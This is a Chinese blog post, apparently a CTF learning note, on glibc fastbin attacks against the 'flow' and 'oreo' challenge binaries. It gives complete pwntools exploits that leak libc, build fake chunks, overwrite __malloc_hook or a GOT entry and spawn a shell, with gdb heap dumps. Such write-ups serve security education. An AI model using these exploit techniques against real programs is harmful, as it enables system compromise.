pwn 堆入门之fastbin attack

阅读数: 次 2021-04-02

字数统计: 1.7k字 | 阅读时长: 9分

1.flow
2.oreo

@TOC
b站原本有一个对堆基础讲的挺好的，好像叫pwn术进阶的堆溢出，但刚刚去看已经没了，好家伙，还好我刚看完，哈哈哈。

flow

#!/usr/bin/env python2
from pwn import *

context(os="linux", arch="amd64", log_level="debug")

#libc
libc=ELF("libc.so.6")
malloc_libc=libc.symbols['__malloc_hook']

menu='ch:'
def add(index,size,content):
	io.sendlineafter(menu,"1")
	io.sendlineafter("?",str(index))
	io.sendlineafter("??",str(size))
	io.sendlineafter(":",content)

def edit(index,size,content):
	io.sendlineafter(menu,"3")
	io.sendlineafter("?",str(index))
	io.sendlineafter("??",str(size))
	io.sendlineafter("say something:",content)

def delet(index):
	io.sendlineafter(menu,"2")
	io.sendlineafter("?",str(index))

def show(index):
	io.sendlineafter(menu,"4")
	io.sendlineafter("?",str(index))
def b(addr):
	# bk="b *$rebase("+str(addr)+")"
	bk="b *"+str(addr)
	attach(io,bk)
	success("attach")
def main(debug):
    global io
    if debug == 0:
        io = process("./flow")
    else:
        io = remote("")
    #leak
    add(0,0x80,'freedom')   #unsorted bins
    add(1,0x60,'freedom')
    add(2,0x60,'freedom')
    delet(0)
    #b(0x400c6d)
    add(0,0x80,'freedoma')
    show(0)
    io.recvuntil("freedoma")
    addr=io.recv(6)                #leak
    print(b"recv(6):addr="+addr)
    addr=addr.ljust(8,b'\x00')
    print(b"ljust:addr="+addr)
    addr=u64(addr)
    print(b'u64:',addr)
    print(b'hex:',hex(addr))

    #count
    libcbase=addr-88-0x10-malloc_libc
    print(b'libcbase:',libcbase)
    print(b'hex:',hex(libcbase))
    print(b'--'*(0x10))
    #b(0x400c6d)
    one=[0x45226,0x4527a,0xf0364,0xf1207]
    one_gadget=libcbase+one[0]
    print(one_gadget)
    print(b'--' * (0x10))

    #for i in range(3,10):
    #    add(i,0x70,b'freedom')
    #for i in range(3,10):
    #    delet(i)
    #b(0x400c6d)

    delet(2)
    print(b'--' * (0x10))
    #delet(1)
    #delet(2)
    #b(0x400c6d)

    #flow
    fakeaddr=libcbase+malloc_libc-0x23  #0xb0x7fffffffdff8
    print(b'fakeaddr:',hex(fakeaddr))
    edit(1,0x100,b'a'*(0x60)+p64(0)+p64(0x71)+p64(fakeaddr))
    print(b'--' * (0x10))
    #b(0x400c6d)
    add(4,0x60,b"freedom")
    #b(0x400c6d)
    #add(5,0x60,b"freedom")#
    #add(6,0x60,b'freedom')
    add(5,0x60,b'a' * (0x13) + p64(one_gadget))
    # b(0x400c6d)
    #getshell
    add(9,0x60,b'aaaa')
    #gdb.attach(io,'b *0x400c6d')
    #b(0x400c6d)

    io.interactive()
main(0)

oreo

giantbranch@ubuntu:~/Desktop/ctfpwn/ctfwiki/2014_hack.lu_oreo$ file oreo
oreo: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), 
dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.26, 
BuildID[sha1]=f591eececd05c63140b9d658578aea6c24450f8b, stripped
giantbranch@ubuntu:~/Desktop/ctfpwn/ctfwiki/2014_hack.lu_oreo$ checksec oreo
[*] '/home/giantbranch/Desktop/ctfpwn/ctfwiki/2014_hack.lu_oreo/oreo'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

结构体

00000000 rifle           struc ; (sizeof=0x38, mappedto_5)
00000000 descript        db 25 dup(?)
00000019 name            db 27 dup(?)
00000034 next            dd ?                    ; offset
00000038 rifle           ends

add（）

1
2
3

malloc时 name大于27，造成堆溢出，可覆盖next指针
head中一直存储最新申请的地址
++rifle_cnt

show_rifles()

打印出信息： name description

unsigned int show_rifles()
{
  rifle *i; // [esp+14h] [ebp-14h]
  unsigned int v2; // [esp+1Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  printf("Rifle to be ordered:\n%s\n", "===================================");
  for ( i = head; i; i = i->next )              // 倒叙输出信息
                                                // 修改next可以输出目标信息，并且是输出next直接指向的地址
  {
    printf("Name: %s\n", i->name);
    printf("Description: %s\n", i);
    puts("===================================");
  }
  return __readgsdword(0x14u) ^ v2;
}

order()

delete：rifle_cnt不为零时递归删除，把next所连全删除
结束时head=0
order_num 0x0804A2A0 ++
rifle_cnt 0x0804A2A8 不为0即可order()

message（）
注意0x0804A2A8处为notice指针，输入一些信息fgets到notice指向位置，因此可以考虑将notice改为某got表地址，用message向该got表上写system_addr,从而调用system函数getshell
show_stats()

1	输出rifle_cnt order_num *notice

此题有两种泄露libc的方法
1.show_rifles()

1
2
3

利用add时的堆溢出，将next指针指向一个函数的got表地址处，
又因为next指向的直接就是chunk的size位后面的内容，即description，
用show_rifles()将其泄露。

2.show_stats()

1
2
3

利用add堆溢出修改fd指针指向0x0804A29c
（此处chunk的size位为order_num,可以order40次来绕过检测），
申请出来后，将*notice改为某got表的地址，show_stats()泄露该got表地址。

脚本

#!/usr/bin/env python2
from pwn import*
context(os="linux",arch="i386",log_level="debug")
content=0
#elf
elf=ELF("oreo")
puts_got=elf.got['puts']
scanf_got=elf.got['__isoc99_sscanf']
def add(name,description):
    io.sendline(b'1')
    io.sendline(name)
    io.sendline(description)

def show():
    io.sendline(b'2')

def order():
    io.sendline(b'3')

def message(notice):
    io.sendline(b'4')
    io.sendline(notice)

def show_sta():
    io.sendline(b'5')

def b(addr):
    bk="b *"+str(addr)
    gdb.attach(io,bk)
    success("attach")

def main():
    global io
    if content==0:
        io=process("./oreo")
    else:
        io=remote("")
    print("puts_got",puts_got)
    name=b'a'*(27)+p32(puts_got)#p32(0x0804A2A4)#
    desc=b's'#p32(puts_got)
    #b(0x08048A22)
    add(name,b'xxx')
    show()
    #leak:puts_addr
    io.recvuntil("===================================")
    io.recvuntil("===================================")
    #b(0x08048A22)
    io.recvuntil("Description: ")
    puts_addr=io.recv(4)
    print("puts_addr:"+puts_addr)
    print(len(puts_addr))
    puts_addr=puts_addr.ljust(8,b'\x00')
    puts_addr=u64(puts_addr)
    print("puts_addr",hex(puts_addr))
    io.recvuntil("===================================")
    #search
    sys_libc=0x03adb0
    binsh_libc=0x15bb0b
    puts_libc=0x05fcb0
    #count
    libcbase=puts_addr-puts_libc
    sys_addr=libcbase+sys_libc
    binsh_addr=libcbase+binsh_libc
    print(b'libcbase',hex(libcbase))
    print(b'sys_addr',hex(sys_addr))
    print(b'binsh_addr',hex(binsh_addr))
    #fix_next
    name = b'a' * (27) + p32(0)  # p32(0x0804A2A4)#
    add(name,desc)
    #fake_chunk
    head_addr=0x0804A29c
    for i in range(0x40):
        order()
    name = b'a' * (27) + p32(0) + p32(0)+ p32(0x41)  + p32(head_addr)  #56
    #b(0x08048A22)
    add(b'a',desc)  #chunkx
    add(b'a',desc)  #chunky
    order()
    add(name,desc)  #chunkx  fast bin chunky->head_addr
    add(b'a',b's')  #chunky
    #change *notice: addr->scanf_got
    desc=p32(0)+p32(scanf_got)
    add(b'aaa',desc)  #chunk_head_addr
    #b(0x08048A22)
    #write:scanf_got<---sys_addr
    notice=p32(sys_addr)
    message(notice)
    #getshell   scanf num(%s,32)
    io.sendline(b"/bin/sh")
    #b(0x08048A22)
    io.interactive()


main()

分析程序以及leak部分调试过程

##############
add 1,2,3

0x95aa410:  0x0000004100000000  0x0000000000000073
0x95aa420:  0x0000000000000000  0x0000000000000000
0x95aa430:  0x0000000000006100  0x0000000000000000
0x95aa440:  0x0000000000000000  0x0000000000000000
pwndbg> 
0x95aa450:  0x0000004100000000  0x0000000000000073
0x95aa460:  0x0000000000000000  0x0000000000000000
0x95aa470:  0x0000000000006100  0x0000000000000000
0x95aa480:  0x0000000000000000  0x095aa41800000000
pwndbg> 
0x95aa490:  0x0000004100000000  0x0000000000000073
0x95aa4a0:  0x0000000000000000  0x0000000000000000
0x95aa4b0:  0x0000000000006100  0x0000000000000000
0x95aa4c0:  0x0000000000000000  0x095aa45800000000

##############

order()

0x40: 0x9bf5410 —▸ 0x9bf5450 —▸ 0x9bf5490 ◂— 0x0

chunk1
0x9bf5410:  0x0000004100000000  0x0000000009bf5450  desc//fd
0x9bf5420:  0x0000000000000000  0x0000000000000000
0x9bf5430:  0x0000000000006100  0x0000000000000000
0x9bf5440:  0x0000000000000000  0x0000000000000000
chunk2
0x9bf5450:  0x0000004100000000  0x0000000009bf5490
0x9bf5460:  0x0000000000000000  0x0000000000000000
0x9bf5470:  0x0000000000006100  0x0000000000000000
0x9bf5480:  0x0000000000000000  0x09bf541800000000  next|4
chunk3
0x9bf5490:  0x0000004100000000  0x0000000000000000
0x9bf54a0:  0x0000000000000000  0x0000000000000000
0x9bf54b0:  0x0000000000006100  0x0000000000000000
0x9bf54c0:  0x0000000000000000  0x09bf545800000000  next|4

0x9bf54d0:  0x0001fb3100000000  0x0000000000000000
0x9bf54e0:  0x0000000000000000  0x0000000000000000
0x9bf54f0:  0x0000000000000000  0x0000000000000000
0x9bf5500:  0x0000000000000000  0x0000000000000000

测试leak：rif_cnt
    name=b'a'*(27)+p32(0x0804A2A4)  #rif_cnt_addr
    desc=b's'
    add(b'aa',desc)
    add(b'aaa',desc)
    add(name,b'xxx')
===================================
Name: aaaaaaaaaaaaaaaaaaaaaaaaaaa\xa4\xa2\x0
Description: xxx
===================================
Name: 
Description: \x03
===================================
leak成功

把rif_cnt_addr改为puts_got_addr
####leak####
('puts_addr', '0xf7dcecb0')

('libcbase', '0xf7d5e000')
('sys_addr', '0xf7d98db0')
('binsh_addr', '0xf7eb9b0b')

    Symbol  Offset  Difference
    system  0x03adb0    0x0
    puts    0x05fcb0    0x24f00
    open    0x0d57f0    0x9aa40
    read    0x0d5c00    0x9ae50
    write   0x0d5c70    0x9aec0
    str_bin_sh  0x15bb0b    0x120d5b

pwndbg> x/16x 0x804c4d0
0x804c4d0:  0x00000000  0x00000041  0x00000073  0x00000000
0x804c4e0:  0x00000000  0x00000000  0x00000000  0x00000000
0x804c4f0:  0x61616100  0x61616161  0x61616161  0x61616161
0x804c500:  0x61616161  0x61616161  0x61616161  0x00000000
pwndbg> 
0x804c510:  0x0000000a  0x00000041  0x00000073  0x00000000
0x804c520:  0x00000000  0x00000000  0x00000000  0x00000000
0x804c530:  0x61616100  0x61616161  0x61616161  0x61616161
0x804c540:  0x61616161  0x61616161  0x61616161  0x0804c4d8

-------------本文结束感谢您的阅读-------------